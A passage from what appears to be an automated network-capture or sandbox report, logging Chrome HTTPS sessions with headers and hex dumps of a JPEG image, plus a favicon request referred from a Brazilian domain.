                                                      2025-01-10 08:27:19 UTC1369INData Raw: b4 f5 7a 6d d7 fb 4c 33 79 3b 66 16 6f 3b ab 97 e7 ed 3c 27 a2 0c 64 00 23 c0 d9 e2 74 e9 8e 3b 48 00 00 00 00 00 00 00 00 00 da 0b 48 00 00 00 00 00 00 00 00 31 f5 ce 3c 65 74 d0 c6 40 00 0c ae d3 c3 3d e5 cd 4f bd 1e a3 cf 70 ee 13 f6 df c7 9c fe 7d a8 a3 05 e6 f5 38 56 4b ed 7e 93 7c b6 4b d2 45 f2 d9 36 35 ba 4b 6f c6 2e 96 cb f3 a0 30 00 00 00 00 00 00 05 df 57 f1 df a8 e8 e7 54 a5 3c dd 47 30 db 6a bc 3f a0 0a c9 60 00 02 db 99 6b ad cc c3 ef 24 36 dc 00 00 00 00 00 00 00 00 da 0b 48 00 00 00 00 00 00 00 01 4d 74 f8 d0 a4 87 0e c0 00 00 09 62 31 db 73 39 c7 47 f6 de 49 c8 fa e4 52 ea be 1c f2 7d 4f c3 5c 79 5d 04 bb f9 6e bd 26 86 4d f4 98 c6 8a 5d ec 98 d7 45 26 f6 f6 ba 3a ef 8d 74 2d f0 d0 b7 e3 40 df 8d 03 7e 34 0d f3 2d 0b 7c 34 2d f5 70 d0 37
                                                      Data Ascii: zmL3y;fo;<'d#t;HH1<et@=Op}8VK~|KE65Ko.0WT<G0j?`k$6HMtb1s9GIR}O\y]n&M]E&:t-@~4-|4-p7
                                                      2025-01-10 08:27:19 UTC1369INData Raw: ff c4 00 53 10 00 01 02 04 02 04 07 0c 07 04 07 07 05 01 01 00 01 02 03 00 04 05 11 06 31 12 13 21 41 10 40 51 52 61 81 91 07 14 15 16 22 30 32 42 50 55 71 d1 20 23 54 94 a1 b1 c1 53 72 92 93 17 33 34 35 36 56 73 24 46 62 82 a2 e1 f0 45 63 b3 c2 f1 08 e2 ff da 00 08 01 01 00 01 3f 00 f3 0e 20 38 d9 49 c8 c2 92 50 a2 95 66 3d 94 84 15 ac 25 39 98 42 02 10 12 9c 87 d3 97 73 49 1a 27 34 fe 5e cc 71 61 a6 d4 b5 64 04 38 b2 e3 8a 5a b3 3c 4a 71 ac 9c 1f 03 ec a9 36 b4 53 a6 73 39 7c 3c c2 14 50 b0 a1 98 84 90 a4 82 32 3e cb a8 3d a4 b0 d2 4e c4 ed 3f 1e 26 a4 85 24 a4 e4 61 c4 16 dc 52 4e ef 64 32 de b5 d0 9d d9 98 02 c2 c3 2f 33 2e e5 8e 81 c8 e5 ec a9 87 83 0c 95 6f c8 0e 98 24 92 49 da 4e 7c 52 71 ad 24 05 81 b4 67 f0 f6 44 b3 5a a6 b6 fa 4a da 7c d0 36 3b
                                                      Data Ascii: S1!A@QRa"02BPUq #TSr3456Vs$FbEc? 8IPf=%9BsI'4^qad8Z<Jq6Ss9|<P2>=N?&$aRNd2/3.o$IN|Rq$gDZJ|6;
                                                      2025-01-10 08:27:19 UTC1369INData Raw: 4b 08 52 dc 70 84 84 a4 5c 93 08 c1 28 97 97 4b 95 7a a3 12 8a 50 d8 93 6b 76 92 20 e0 99 83 3d 2e 86 66 9a 7a 4d fb da 65 02 e0 58 13 b4 5f 7d b9 62 a5 25 e0 ea 9b f2 85 cd 61 65 5a 25 56 b5 fa a3 16 7f 81 69 5f bc d7 ff 00 1a a2 4e 4d f9 f9 b4 4b ca 36 5c 75 67 60 1f 9f c2 0e 0f 95 96 d1 6e a5 5b 96 97 99 50 fe ae c3 67 69 1f 90 8a de 1b 9a a2 84 b8 b5 25 e9 55 9b 25 e4 7e a3 77 04 97 f7 8c b7 fa a9 fc c4 77 44 fe d1 4f fd d5 fe 63 83 03 d6 1c ef a3 4b 98 56 9b 2e 24 96 82 b6 e8 91 b4 8f 81 17 ec 8c 43 4e 45 33 10 4c cb b7 b1 9d 20 a4 74 24 ed b7 56 5d 51 31 82 66 db aa 31 28 c3 c9 74 38 82 b5 3a 53 a2 94 00 6d b7 3e 58 c4 34 14 d0 97 2e 84 cc eb d4 e8 51 51 d1 d1 d1 22 dd 27 96 2b b8 71 ca 34 9c b3 cb 9a 0f 07 8d 82 42 6d a3 b2 fc b1 e2 ca d7 86 3c 2c
                                                      Data Ascii: KRp\(KzPkv =.fzMeX_}b%aeZ%Vi_NMK6\ug`n[Pgi%U%~wwDOcKV.$CNE3L t$V]Q1f1(t8:Sm>X4.QQ"'+q4Bm<,
                                                      2025-01-10 08:27:19 UTC1369INData Raw: 09 3e 49 e7 27 71 8c 03 20 f1 a8 bd 3c 52 44 ba 5b 2d 85 1f 59 44 8c be 16 8c 4d fe 28 a8 7f aa 7f 28 c5 9f e0 5a 57 ef 35 ff 00 c6 a8 c1 ae 19 bc 35 52 a7 b4 e1 6e 62 ea 28 50 36 23 49 36 07 a8 88 7e 76 a7 2d 30 b6 5f 9a 9b 43 ad 9d 15 25 4e aa e0 f6 c2 aa 53 ca 49 4a a7 26 4a 48 b1 05 d5 6d fc 78 24 bf bc 65 bf d5 4f e6 23 ba 27 f6 8a 7f ee af f3 10 94 a9 6a 09 40 25 47 60 00 6d 31 85 a8 fe 03 94 7e ad 57 fa 93 ab b2 52 ac d0 9d e4 f4 9d 82 df 38 aa 4f 2a a5 55 98 9b 58 b1 75 77 03 90 64 07 65 a3 ba 27 f6 7a 7f ef 2f f2 1c 18 f3 fb 9a 9b fb df fd 62 8b 50 34 ca d4 b4 d5 fc 94 2e cb e9 49 d8 7f 08 7a 88 97 71 cc b5 45 20 16 0b 25 c5 1d c5 62 c9 1f 81 07 aa 2b f5 1f 0a 57 66 66 12 6e de 96 8b 7f ba 36 0f 9f 5c 48 a9 ea 9f 73 90 d5 3d c5 a6 6e 5b 65 9b 55
                                                      Data Ascii: >I'q <RD[-YDM((ZW55Rnb(P6#I6~v-0_C%NSIJ&JHmx$eO#'j@%G`m1~WR8O*UXuwde'z/bP4.IzqE %b+Wffn6\Hs=n[eU
                                                      2025-01-10 08:27:19 UTC1369INData Raw: 34 fd f2 4f 35 5d 44 ed e8 26 36 79 d9 69 85 ca cd 36 f3 46 cb 41 b8 89 09 c4 4f 49 36 fb 79 2c 6d 1c 87 78 e1 c6 34 af 46 a2 ca 79 12 f0 1f 82 bf 4e ce 33 32 e6 92 f4 46 49 f6 2c c3 7a 6d dc 66 9d bc 5f 03 d1 bb ea 78 d4 1f 4f d4 cb 9b 36 08 f4 97 cb d5 f9 db 84 c7 77 ec 6c 5b 65 ac 2d 20 e1 0a 70 25 e9 d5 24 fa b9 a5 1d 64 02 7a 2d cb 04 41 10 44 5a c7 80 8b 88 ee 69 89 7c 37 87 7b d2 65 c2 a9 e9 00 10 b2 a3 b5 68 f5 55 fa 1f 87 4f 9e c2 f5 3e f5 9b 32 ae ab ea 9d 3e 4d f7 2a 07 03 cc a2 61 85 b4 ea 42 9b 71 25 2a 07 78 8a a5 3d 74 ca 8b b2 ce 6d 09 37 42 b9 c9 dc 78 bb ce 6a db 24 66 76 0f 63 be de 83 9b 32 3b 47 15 92 94 76 7e 79 99 69 71 77 1d 56 88 e8 e9 3d 1b e2 9d 22 d5 36 9c cc ac b8 f2 1a 4d af ce 3b cf 59 e1 c5 b8 8e 5f 0a e1 69 ea ac d5 88 97
                                                      Data Ascii: 4O5]D&6yi6FAOI6y,mx4FyN32FI,zmf_xO6wl[e- p%$dz-ADZi|7{ehUO>2>M*aBq%*x=tm7Bxj$fvc2;Gv~yiqwV="6M;Y_i
                                                      2025-01-10 08:27:19 UTC1369INData Raw: eb 9a b6 c9 df 90 83 b4 ed f6 6a 80 52 48 39 18 5a 4a 16 52 77 79 da 6c 83 b5 3a 93 32 ac 7a 4e 2a c5 5c d1 bc c4 a4 ab 52 52 6d 4b 4b a7 45 a6 92 12 91 c3 8d f1 33 58 4f 0a cd 54 16 41 7a da b9 74 1f 59 c2 3c 91 f0 df f0 11 33 30 ec e4 db d3 33 2b 2e 3e f2 ca dc 59 f5 94 4d c9 e0 dd 04 41 17 82 21 42 08 85 0d 90 44 11 04 41 11 2d 2a f4 ec e3 12 d2 8d a9 d7 df 58 6d b6 d3 9a 94 4d 80 ed 8e e7 b8 45 ac 15 82 e4 e9 88 d1 54 ce d7 26 5c 03 d3 71 59 f6 6c 03 a0 45 56 41 35 0a 7b 8c 9f 4b 34 9e 43 0e 21 4d 38 a4 2c 10 a4 9b 11 e7 b0 d5 4f bf 24 03 2b 3f 5a c8 b6 dd e3 71 81 97 05 5a 9c 8a a5 35 c9 75 d8 28 ed 42 8f aa a1 94 3a d2 d9 79 6d 3a 92 95 a0 94 a9 27 71 f3 cf b9 a6 e5 87 a2 9c bd 9f 34 dd d3 a6 33 19 f9 dc 13 46 ef 3a 79 9e 7d 36 7e 64 79 17 f5 51 bb
                                                      Data Ascii: jRH9ZJRwyl:2zN*\RRmKKE3XOTAztY<303+.>YMA!BDA-*XmMET&\qYlEVA5{K4C!M8,O$+?ZqZ5u(B:ym:'q43F:y}6~dyQ
                                                      2025-01-10 08:27:19 UTC1369INData Raw: 91 99 ff 00 cd f0 cb 2d cb b0 86 59 48 43 6d a4 25 29 1b 80 e1 ee 8b 8b 11 84 f0 93 f3 0d a8 77 f4 c5 da 96 4f fc 64 1f 2b e0 33 85 29 4e 2d 4b 71 45 4a 51 25 4a 26 e4 93 99 f3 9b a2 46 42 62 a7 52 97 91 92 6c b9 33 32 b0 db 69 e5 26 30 9e 1d 97 c2 f8 62 4e 97 2a 05 99 45 dc 5f 3d 67 6a 95 d6 7c cd 5e 9e 9a 85 3d 6d 7a e3 6a 0f 21 87 49 69 c5 21 60 85 20 d8 83 05 d8 2e 5e 0a e0 ae 14 e4 17 20 ae 0b 90 5c 82 e4 15 c1 5f 24 15 c7 73 da ff 00 7c 4b aa 95 30 b3 ad 64 69 35 7d e8 e4 ea 81 c0 fb 08 99 97 71 97 93 a4 db 89 29 50 e8 8a 94 83 94 da 8b b2 ce ed d1 3e 4a b9 c3 71 fa 53 0e 69 b9 61 92 7d af 32 de 8a f4 86 4a fc fe 8e 0e a3 78 36 93 df 0f 26 d3 33 40 28 df 34 a7 70 fd 7f fc e1 5a d2 da 0a 96 40 4a 45 c9 3b a3 ba 46 2c 38 b7 17 3a f3 2a 06 42 52 ec cb
                                                      Data Ascii: -YHCm%)wOd+3)N-KqEJQ%J&FBbRl32i&0bN*E_=gj|^=mzj!Ii!` .^ \_$s|K0di5}q)P>JqSia}2Jx6&3@(4pZ@JE;F,8:*BR


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.949734172.66.43.954432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:20 UTC373OUTGET /media/2017/03/google-drive.jpg HTTP/1.1
                                                      Host: www.teledataict.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:20 UTC927INHTTP/1.1 200 OK
                                                      Date: Fri, 10 Jan 2025 08:27:20 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 22545
                                                      Connection: close
                                                      Cf-Bgj: imgq:100,h2pri
                                                      Cf-Polished: origSize=24194
                                                      Last-Modified: Sun, 15 Oct 2017 10:40:30 GMT
                                                      Cache-Control: max-age=14400
                                                      CF-Cache-Status: HIT
                                                      Age: 1
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BW6Nfng1MDlhIWcFP0vSqHDjAQXBtciuGP2iJ7JTxE7mHcSjPQxdaWyt1eutq2RFuvwSc%2Bi4HHZxaCD3AIvZoSoEkkbs5KRZVPza%2B3ZhXPnhsOfP%2FF8akqqrYglexBE0pcaTocw%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8ffb498b6abe43e6-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1722&min_rtt=1722&rtt_var=647&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=951&delivery_rate=1689814&cwnd=252&unsent_bytes=0&cid=537bb4eec0cee53a&ts=148&x=0"
                                                      2025-01-10 08:27:20 UTC442INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 04 04 05 04 03 05 05 04 05 06 06 05 06 08 0e 09 08 07 07 08 11 0c 0d 0a 0e 14 11 15 14 13 11 13 13 16 18 1f 1b 16 17 1e 17 13 13 1b 25 1c 1e 20 21 23 23 23 15 1a 26 29 26 22 29 1f 22 23 22 01 06 06 06 08 07 08 10 09 09 10 22 16 13 16 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 ff c2 00 11 08 02 58 03 84 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 07 06 08 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 01 02 03 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea 43 e7 de dc 00 00 b7 53 b8 c3 99 13
                                                      Data Ascii: JFIF% !###&)&")"#""""""""""""""""""""""""""""""""""""""""""""""""""""X"5CS
                                                      2025-01-10 08:27:20 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 03 17 27 49 23 10 8b 3c 00 00 00 01 9e 2b a7 00 00 00 01 ab 8f 65 ad b9 aa 09 1c 40 00 00 00 00 00 00 00 00 00 00 01 76 33 93 9b 4a d1 db 07 3e 80 00 00 00 5d 9f ae c8 e7 cb 2c 71 e0 00 00 00 00 00 00 00 00 00 00 00 00 2c cb 13 57 7d 96 d8 0e 98 00 00 00 03 3d 55 74 da 2a 28 a8 a2 a2 8a 8a 2a 29 ad d9 c7 df 8e a9 55 cd 65 15 14 54 51 51 45 45 15 14 54 51 51 45 45 15 14 54 51 51 45 45 15 14 54 51 51 4c f8 76 d0 a5 40 9d 5d 3a 04 e2 04 e2 04 e2 04 e2 04 e2 04 e2 04 e3 22 48 26 8f 1a aa 34 c5 54 15 50 55 41 55 05 54 15 50 55 41 55 05 54 15 50 55 41 55 05 54 15 50 55 41 5d 6e 6e 92 5e 2d 55 3d 45 45 15 14 54 51 51 45 45 15 1e 88 6f a8 03 69 b6 ba b7 ae b2 47 0f 28 22 c9 00 0c 28 36 3a e8 32 83 8f 51 ed bb f0 f1 23 87 70 09 3d cc 88
                                                      Data Ascii: 'I#<+e@v3J>],q,W}=Ut*(*)UeTQQEETQQEETQQEETQQLv@]:"H&4TPUAUTPUAUTPUAUTPUA]nn^-U=EETQQEEoiG("(6:2Q#p=
                                                      2025-01-10 08:27:20 UTC1369INData Raw: f5 de af cd 0b 6d ab 7c d7 c8 9e f3 9f 72 f9 99 56 94 56 59 2d 98 cc 11 e4 47 af 5c 78 f2 22 d3 ac 11 cf 1e bd 60 b2 6b 35 e9 4f b7 38 b7 d2 f2 bd 8e 07 32 eb 7e 2b c6 7b af 2e 3e 4d e8 40 00 00 00 7b ef 03 99 e8 61 f5 24 33 7d c7 ca e0 72 ce c5 e2 ab e7 f8 f1 49 70 00 00 00 03 03 27 06 2f 70 8b 20 00 00 00 00 00 00 00 00 da 0b 48 00 00 00 00 00 00 00 00 06 ba cc dc 2a f9 61 cf a0 00 00 dc e9 ba f5 84 1d d5 4f 63 e5 9c e3 a0 7c 81 8f 3f e7 ab 4a f0 f9 b0 0a 54 47 1c d6 6b b4 11 e4 47 8e 98 f1 cf 1f 3e d0 6c b0 3e 96 de cf ab 6c e9 59 9f 48 63 e4 35 df 94 41 ed 7c 57 c2 3d 68 52 49 00 00 00 03 d7 7a fe 49 d3 be bb e7 73 a2 95 ed aa b9 36 1f 44 e7 7e 73 d0 04 69 00 00 02 95 c6 d7 38 f6 15 b3 41 90 00 00 00 00 00 00 00 03 68 2d 20 00 00 00 00 00 00 00 00 0d
                                                      Data Ascii: m|rVVY-G\x"`k5O82~+{.>M@{a$3}rIp'/p H*aOc|?JTGkG>l>lYHc5A|W=hRIzIs6D~si8Ah-
                                                      2025-01-10 08:27:20 UTC1369INData Raw: 70 6a 00 00 00 00 00 00 02 b4 f5 7a 6d d7 fb 4c 33 79 3b 66 16 6f 3b ab 97 e7 ed 3c 27 a2 0c 64 00 23 c0 d9 e2 74 e9 8e 3b 48 00 00 00 00 00 00 00 00 00 da 0b 48 00 00 00 00 00 00 00 00 31 f5 ce 3c 65 74 d0 c6 40 00 0c ae d3 c3 3d e5 cd 4f bd 1e a3 cf 70 ee 13 f6 df c7 9c fe 7d a8 a3 05 e6 f5 38 56 4b ed 7e 93 7c b6 4b d2 45 f2 d9 36 35 ba 4b 6f c6 2e 96 cb f3 a0 30 00 00 00 00 00 00 05 df 57 f1 df a8 e8 e7 54 a5 3c dd 47 30 db 6a bc 3f a0 0a c9 60 00 02 db 99 6b ad cc c3 ef 24 36 dc 00 00 00 00 00 00 00 00 da 0b 48 00 00 00 00 00 00 00 01 4d 74 f8 d0 a4 87 0e c0 00 00 09 62 31 db 73 39 c7 47 f6 de 49 c8 fa e4 52 ea be 1c f2 7d 4f c3 5c 79 5d 04 bb f9 6e bd 26 86 4d f4 98 c6 8a 5d ec 98 d7 45 26 f6 f6 ba 3a ef 8d 74 2d f0 d0 b7 e3 40 df 8d 03 7e 34 0d f3
                                                      Data Ascii: pjzmL3y;fo;<'d#t;HH1<et@=Op}8VK~|KE65Ko.0WT<G0j?`k$6HMtb1s9GIR}O\y]n&M]E&:t-@~4
                                                      2025-01-10 08:27:20 UTC1369INData Raw: 4c 6d ae 70 b2 84 00 00 01 ff c4 00 53 10 00 01 02 04 02 04 07 0c 07 04 07 07 05 01 01 00 01 02 03 00 04 05 11 06 31 12 13 21 41 10 40 51 52 61 81 91 07 14 15 16 22 30 32 42 50 55 71 d1 20 23 54 94 a1 b1 c1 53 72 92 93 17 33 34 35 36 56 73 24 46 62 82 a2 e1 f0 45 63 b3 c2 f1 08 e2 ff da 00 08 01 01 00 01 3f 00 f3 0e 20 38 d9 49 c8 c2 92 50 a2 95 66 3d 94 84 15 ac 25 39 98 42 02 10 12 9c 87 d3 97 73 49 1a 27 34 fe 5e cc 71 61 a6 d4 b5 64 04 38 b2 e3 8a 5a b3 3c 4a 71 ac 9c 1f 03 ec a9 36 b4 53 a6 73 39 7c 3c c2 14 50 b0 a1 98 84 90 a4 82 32 3e cb a8 3d a4 b0 d2 4e c4 ed 3f 1e 26 a4 85 24 a4 e4 61 c4 16 dc 52 4e ef 64 32 de b5 d0 9d d9 98 02 c2 c3 2f 33 2e e5 8e 81 c8 e5 ec a9 87 83 0c 95 6f c8 0e 98 24 92 49 da 4e 7c 52 71 ad 24 05 81 b4 67 f0 f6 44 b3 5a
                                                      Data Ascii: LmpS1!A@QRa"02BPUq #TSr3456Vs$FbEc? 8IPf=%9BsI'4^qad8Z<Jq6Ss9|<P2>=N?&$aRNd2/3.o$IN|Rq$gDZ
                                                      2025-01-10 08:27:20 UTC1369INData Raw: 2b f2 1e 43 0e 4a b8 fb e8 4b 08 52 dc 70 84 84 a4 5c 93 08 c1 28 97 97 4b 95 7a a3 12 8a 50 d8 93 6b 76 92 20 e0 99 83 3d 2e 86 66 9a 7a 4d fb da 65 02 e0 58 13 b4 5f 7d b9 62 a5 25 e0 ea 9b f2 85 cd 61 65 5a 25 56 b5 fa a3 16 7f 81 69 5f bc d7 ff 00 1a a2 4e 4d f9 f9 b4 4b ca 36 5c 75 67 60 1f 9f c2 0e 0f 95 96 d1 6e a5 5b 96 97 99 50 fe ae c3 67 69 1f 90 8a de 1b 9a a2 84 b8 b5 25 e9 55 9b 25 e4 7e a3 77 04 97 f7 8c b7 fa a9 fc c4 77 44 fe d1 4f fd d5 fe 63 83 03 d6 1c ef a3 4b 98 56 9b 2e 24 96 82 b6 e8 91 b4 8f 81 17 ec 8c 43 4e 45 33 10 4c cb b7 b1 9d 20 a4 74 24 ed b7 56 5d 51 31 82 66 db aa 31 28 c3 c9 74 38 82 b5 3a 53 a2 94 00 6d b7 3e 58 c4 34 14 d0 97 2e 84 cc eb d4 e8 51 51 d1 d1 d1 22 dd 27 96 2b b8 71 ca 34 9c b3 cb 9a 0f 07 8d 82 42 6d a3
                                                      Data Ascii: +CJKRp\(KzPkv =.fzMeX_}b%aeZ%Vi_NMK6\ug`n[Pgi%U%~wwDOcKV.$CNE3L t$V]Q1f1(t8:Sm>X4.QQ"'+q4Bm
                                                      2025-01-10 08:27:20 UTC1369INData Raw: 2b b4 d7 29 d5 07 5b 5a 48 09 3e 49 e7 27 71 8c 03 20 f1 a8 bd 3c 52 44 ba 5b 2d 85 1f 59 44 8c be 16 8c 4d fe 28 a8 7f aa 7f 28 c5 9f e0 5a 57 ef 35 ff 00 c6 a8 c1 ae 19 bc 35 52 a7 b4 e1 6e 62 ea 28 50 36 23 49 36 07 a8 88 7e 76 a7 2d 30 b6 5f 9a 9b 43 ad 9d 15 25 4e aa e0 f6 c2 aa 53 ca 49 4a a7 26 4a 48 b1 05 d5 6d fc 78 24 bf bc 65 bf d5 4f e6 23 ba 27 f6 8a 7f ee af f3 10 94 a9 6a 09 40 25 47 60 00 6d 31 85 a8 fe 03 94 7e ad 57 fa 93 ab b2 52 ac d0 9d e4 f4 9d 82 df 38 aa 4f 2a a5 55 98 9b 58 b1 75 77 03 90 64 07 65 a3 ba 27 f6 7a 7f ef 2f f2 1c 18 f3 fb 9a 9b fb df fd 62 8b 50 34 ca d4 b4 d5 fc 94 2e cb e9 49 d8 7f 08 7a 88 97 71 cc b5 45 20 16 0b 25 c5 1d c5 62 c9 1f 81 07 aa 2b f5 1f 0a 57 66 66 12 6e de 96 8b 7f ba 36 0f 9f 5c 48 a9 ea 9f 73 90
                                                      Data Ascii: +)[ZH>I'q <RD[-YDM((ZW55Rnb(P6#I6~v-0_C%NSIJ&JHmx$eO#'j@%G`m1~WR8O*UXuwde'z/bP4.IzqE %b+Wffn6\Hs
                                                      2025-01-10 08:27:20 UTC1369INData Raw: 17 b1 43 42 61 7a 32 13 84 34 fd f2 4f 35 5d 44 ed e8 26 36 79 d9 69 85 ca cd 36 f3 46 cb 41 b8 89 09 c4 4f 49 36 fb 79 2c 6d 1c 87 78 e1 c6 34 af 46 a2 ca 79 12 f0 1f 82 bf 4e ce 33 32 e6 92 f4 46 49 f6 2c c3 7a 6d dc 66 9d bc 5f 03 d1 bb ea 78 d4 1f 4f d4 cb 9b 36 08 f4 97 cb d5 f9 db 84 c7 77 ec 6c 5b 65 ac 2d 20 e1 0a 70 25 e9 d5 24 fa b9 a5 1d 64 02 7a 2d cb 04 41 10 44 5a c7 80 8b 88 ee 69 89 7c 37 87 7b d2 65 c2 a9 e9 00 10 b2 a3 b5 68 f5 55 fa 1f 87 4f 9e c2 f5 3e f5 9b 32 ae ab ea 9d 3e 4d f7 2a 07 03 cc a2 61 85 b4 ea 42 9b 71 25 2a 07 78 8a a5 3d 74 ca 8b b2 ce 6d 09 37 42 b9 c9 dc 78 bb ce 6a db 24 66 76 0f 63 be de 83 9b 32 3b 47 15 92 94 76 7e 79 99 69 71 77 1d 56 88 e8 e9 3d 1b e2 9d 22 d5 36 9c cc ac b8 f2 1a 4d af ce 3b cf 59 e1 c5 b8 8e
                                                      Data Ascii: CBaz24O5]D&6yi6FAOI6y,mx4FyN32FI,zmf_xO6wl[e- p%$dz-ADZi|7{ehUO>2>M*aBq%*x=tm7Bxj$fvc2;Gv~yiqwV="6M;Y
                                                      2025-01-10 08:27:20 UTC1369INData Raw: d2 ef dd 49 b7 aa 77 8f 3e eb 9a b6 c9 df 90 83 b4 ed f6 6a 80 52 48 39 18 5a 4a 16 52 77 79 da 6c 83 b5 3a 93 32 ac 7a 4e 2a c5 5c d1 bc c4 a4 ab 52 52 6d 4b 4b a7 45 a6 92 12 91 c3 8d f1 33 58 4f 0a cd 54 16 41 7a da b9 74 1f 59 c2 3c 91 f0 df f0 11 33 30 ec e4 db d3 33 2b 2e 3e f2 ca dc 59 f5 94 4d c9 e0 dd 04 41 17 82 21 42 08 85 0d 90 44 11 04 41 11 2d 2a f4 ec e3 12 d2 8d a9 d7 df 58 6d b6 d3 9a 94 4d 80 ed 8e e7 b8 45 ac 15 82 e4 e9 88 d1 54 ce d7 26 5c 03 d3 71 59 f6 6c 03 a0 45 56 41 35 0a 7b 8c 9f 4b 34 9e 43 0e 21 4d 38 a4 2c 10 a4 9b 11 e7 b0 d5 4f bf 24 03 2b 3f 5a c8 b6 dd e3 71 81 97 05 5a 9c 8a a5 35 c9 75 d8 28 ed 42 8f aa a1 94 3a d2 d9 79 6d 3a 92 95 a0 94 a9 27 71 f3 cf b9 a6 e5 87 a2 9c bd 9f 34 dd d3 a6 33 19 f9 dc 13 46 ef 3a 79 9e
                                                      Data Ascii: Iw>jRH9ZJRwyl:2zN*\RRmKKE3XOTAztY<303+.>YMA!BDA-*XmMET&\qYlEVA5{K4C!M8,O$+?ZqZ5u(B:ym:'q43F:y
                                                      2025-01-10 08:27:20 UTC1369INData Raw: 59 99 56 ee 12 a3 75 ab 9a 91 99 ff 00 cd f0 cb 2d cb b0 86 59 48 43 6d a4 25 29 1b 80 e1 ee 8b 8b 11 84 f0 93 f3 0d a8 77 f4 c5 da 96 4f fc 64 1f 2b e0 33 85 29 4e 2d 4b 71 45 4a 51 25 4a 26 e4 93 99 f3 9b a2 46 42 62 a7 52 97 91 92 6c b9 33 32 b0 db 69 e5 26 30 9e 1d 97 c2 f8 62 4e 97 2a 05 99 45 dc 5f 3d 67 6a 95 d6 7c cd 5e 9e 9a 85 3d 6d 7a e3 6a 0f 21 87 49 69 c5 21 60 85 20 d8 83 05 d8 2e 5e 0a e0 ae 14 e4 17 20 ae 0b 90 5c 82 e4 15 c1 5f 24 15 c7 73 da ff 00 7c 4b aa 95 30 b3 ad 64 69 35 7d e8 e4 ea 81 c0 fb 08 99 97 71 97 93 a4 db 89 29 50 e8 8a 94 83 94 da 8b b2 ce ed d1 3e 4a b9 c3 71 fa 53 0e 69 b9 61 92 7d af 32 de 8a f4 86 4a fc fe 8e 0e a3 78 36 93 df 0f 26 d3 33 40 28 df 34 a7 70 fd 7f fc e1 5a d2 da 0a 96 40 4a 45 c9 3b a3 ba 46 2c 38 b7
                                                      Data Ascii: YVu-YHCm%)wOd+3)N-KqEJQ%J&FBbRl32i&0bN*E_=gj|^=mzj!Ii!` .^ \_$s|K0di5}q)P>JqSia}2Jx6&3@(4pZ@JE;F,8


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.949733172.217.23.1104432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:20 UTC678OUTGET /favicon.ico HTTP/1.1
                                                      Host: google.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIlKHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://i.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:20 UTC454INHTTP/1.1 301 Moved Permanently
                                                      Location: https://www.google.com/favicon.ico
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      X-Content-Type-Options: nosniff
                                                      Server: sffe
                                                      Content-Length: 231
                                                      X-XSS-Protection: 0
                                                      Date: Fri, 10 Jan 2025 08:08:06 GMT
                                                      Expires: Fri, 10 Jan 2025 08:38:06 GMT
                                                      Cache-Control: public, max-age=1800
                                                      Content-Type: text/html; charset=UTF-8
                                                      Age: 1154
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close
